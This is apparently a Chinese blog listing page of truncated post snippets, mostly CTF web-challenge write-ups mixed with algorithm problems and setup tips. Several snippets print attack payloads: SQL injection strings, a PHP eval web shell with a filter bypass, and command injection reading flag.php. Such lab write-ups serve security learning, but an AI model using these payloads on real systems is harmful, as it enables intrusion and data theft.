roarctf 2019 easy calc

这个没有入口，只能一个个看，发现qes这个函数有一堆数，函数很小，逆向也容易，找到然后用BJD包裹。a=[0x7FFA7E31,0x224FC,0x884A4239,0x22A84,0x84FF235,0x3FF87,……最终得到flag：BJD{HACKIT4FUN} ......

如果你像大多数人一样，没有一个无底般的银行帐户。你可能需要仔细观察你的每月支出。有很多方法可以做到这一点，但是最快最简单的方法是使用电子表格。许多人创建一个非常基本的电子表格来完成这项工作，它由两长列组成，总计位于底部。这是可行的，但这有点傻。我将通过使用 LibreOffice Calc 创建一个... ......

E1. Doremy's Drying Plan (Easy Version) The only differences between the two versions of this problem are the constraint on $k$, the time limit and th ......

安装包下载： https://downloads.mysql.com/archives/community/ 下载mysql-8.0.32-winx64.zip 1、制定目录配置 basedir=D:\\mysql8.0.32#mysql数据存放目录datadir=D:\\mysql8.0.32\\ ......

看：https://www.cnblogs.com/liming19680104/p/17744270.html 其中的 方法五--VS2019纯汇编 ......

题目打开如下。 经 Fuzzing，发现许多关键词被检测，其中常见的如空格、union、and 都会被检测。 这里使用报错注入出 Flag。 GET /check.php?username=1&password=1'or(updatexml(1,concat(0x7e,database()),1)) ......

这道题挺好的，可以帮助我更好的理解gadget的利用以及rop技术 首先，查一下程序保护情况 拖进ida分析 这里sys_read和sys_write是系统调用函数，看汇编可以分析出来 我们首先要了解一下64位系统的系统调用 传参方式：首先将系统调用号 传入 rax，然后将参数 从左到右 依次存入 ......

[十二省联考 2019] 字符串问题 题意很唬人，实际上就是让你建出一个二分图模型，然后求点权和最大的路径，其中 \(B_i\) 要向所有满足 \(B_i\) 是 \(A_j\) 的前缀的 \(A_j\) 连边。直接连边是 \(O(n^2)\) 的。考虑优化，不难想到 SA 的优良性质，即 \(B_ ......

题目附件如下。 <?php session_start(); echo "<meta http-equiv=\"Content-Type\" content=\"text/html; charset=utf-8\" /> <title>Upload</title> <form action=\"\" ......

题目给出了源码，如下。 <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <met ......

[十二省联考 2019] 春节十二响 感觉作为例题还是挺不错的。 感官上直接分析比较困难。不妨先考虑怎样的段长集合是合法的。 注意到合法等价于对每一条从根到叶子的链都合法，考虑在链上贪心，尝试将每个和比他大的最小的点做匹配，如果能匹配上就是合法。很显然，如果仅考虑一条链，那么极小的一个合法段长集合就 ......

Problem - 1868B1 - Codeforces Candy Party (Easy Version) - 洛谷 喵喵题。首先每个数最终肯定变成 \(\overline a\) ，如果 \(\overline a\) 不是整数显然无解。 然后记 \(b_i=a_i-\overline a\ ......

打开题目，得到一段源码，如下。 <?php $text = $_GET["text"]; $file = $_GET["file"]; $password = $_GET["password"]; if(isset($text)&&(file_get_contents($text,'r') "wel ......

如何在 Windows Server 2019 中启用 Telnet 客户端这篇文章将介绍如何在 Microsoft 的 Windows Server 2019 中安装 telnet 客户端。 启用 Telnet 客户端首先，我们需要启用 telnet 客户端，如果我们不启用它，我们将在尝试使用它时 ......

相信大家都看过题，但还请搞清楚是数对应结点编号。这里用 \(a_i\) 表示 \(i\) 号结点对应的数。 对于 \(n\leq 10\) 的数据，全排列出删边的顺序然后模拟，取字典序最小的方案。 对于菊花，仍然考虑删边的顺序，假设删边依次是 \(rt\to v_1,rt\to v_2,\cdots ......

考虑一个结点在什么情况下会成为重心。 随便钦定一个根结点。对于结点 \(u\)，假设割掉了其子树 \(v\) 中的某条边或连接 \(u\) 和 \(v\) 的边，形成了一棵大小为 \(k\) 的新树。 令 \(mx\) 表示除 \(v\) 子树外最大的子树大小（或 \(n-siz_u\)）。如果 \ ......

[Cnoi2019] 青染之心 题目描述： Cirno初始有一个空的物品序列，一个大小为 \(V\) 的背包，现在你有 \(q\) 个操作，分为两种： add x y : 表示加入一种体积为 \(x\), 价值为 \(y\) 的物品到序列末尾 erase : 表示删除序列末尾的物品 对于每个操作结束 ......

打开题目，输入：11';show databases;# 后可以发现是堆叠注入。 输入：11';show tables;#。 查看 1919810931114514 表中有什么字段：11';show columns from 1919810931114514;#。 查看 words 表中有什么字段： ......

题目提示如下。 猜测后台语句是设置为仅在用户输入与 flag 完全一致时才输出 flag。 尝试输入：1;show databases;#，发现存在堆叠注入。 输入：1;show tables;#，获取当前存在的数据表。 尝试输入：1;show columns from Flag;#，经过对比，发现 ......

访问靶场，是一个登录框，直接尝试万能密码：admin' or 1=1;# 即可获得 flag。 ......

访问网站如下。 在网页源代码中有提示。 <!-- $cat=$_GET['cat']; echo $cat; if($cat=='dog'){ echo 'Syc{cat_cat_cat_cat}'; } --> Payload：/?cat=dog。 ......

打开题目如下。 直接使用万能密码即可登录，但未拿到 flag。 这里尝试联合注入，首先确定字段数量，Payload：admin' or 1=1 order by 1;#，当字段数为 4 时报错，因此字段数为 3。 接下来判断什么位置的字段会输出：admin' union select 1,2,3;# ......

打开网页如下。 查看页面源代码，发现存在 Secret.php 页面。 <h2>小组简介</h2> <p>·成立时间：2005年3月 ·研究领域：渗透测试、逆向工程、密码学、IoT硬件安全、移动安全、安全编程、二进制漏洞挖掘利用等安全技术 ·小组的愿望：致力于成为国内实力强劲和拥有广泛影响力的安全研 ......

题目访问如下。 直接使用 antsword 连接即可。 ......

打开题目后发现是一道上传题，如下。 随便上传个 .jpg 结尾的小马上去，提示：NO! HACKER! your file included '<?'。 <?php @eval($_POST['cmd']); ?> 因此使用其他方式替换掉 <?。 <script language="php">@ev ......

打开题目如下。 尝试输入：admin' or 1=1;#，发现 or 被过滤了。 尝试双写绕过：admin' oorr 1=1;#，成功登录。 接下来是与 **[极客大挑战 2019]LoveSQL **类似的，只是多使用了一个双写绕过而已。 ......

访问题目后存在提示。 随后输入：/?ip=1;ls 即可看到当前目录下存在 flag.php 文件。 这里尝试使用 Payload：/?ip=1;cat flag.php 得到如下。 这里尝试使用：${IFS}、{IFS}$9、$IFS$9 来绕过空格过滤，发现程序也检测了 {、} 符号，因此使用 ......

打开题目如下。 查看页面源代码，发现存在 Archive_room.php 文件。 访问 Archive_room.php 文件如下。 使用 BurpSuite 抓包，点击 SECRET 后，发现其中某个跳转的页面源代码存在提示 secr3t.php。 HTTP/1.1 302 Found Serv ......

题目链接 观察题目，我们发现直接计算是困难的，先构造单个合法的 \(T\) 分析其性质。 为了构造出 \(T\)，先考虑构造时 \(T\) 时什么时候会出现不合法的情况，此时 \(T\) 会有一段和 \(S\) 相同的前缀，且这段前缀后面跟着的字符比 \(S\) 所跟的小。 为了避免这种情况出现，我 ......

题目一打开，是一个计算器。 主页源代码如下，这里可以看到有一个 calc.php 文件，并且提示存在 WAF（疑）。 <!--I've set up WAF to ensure security.--> <script> $('#calc').submit(function(){ $.ajax({ ......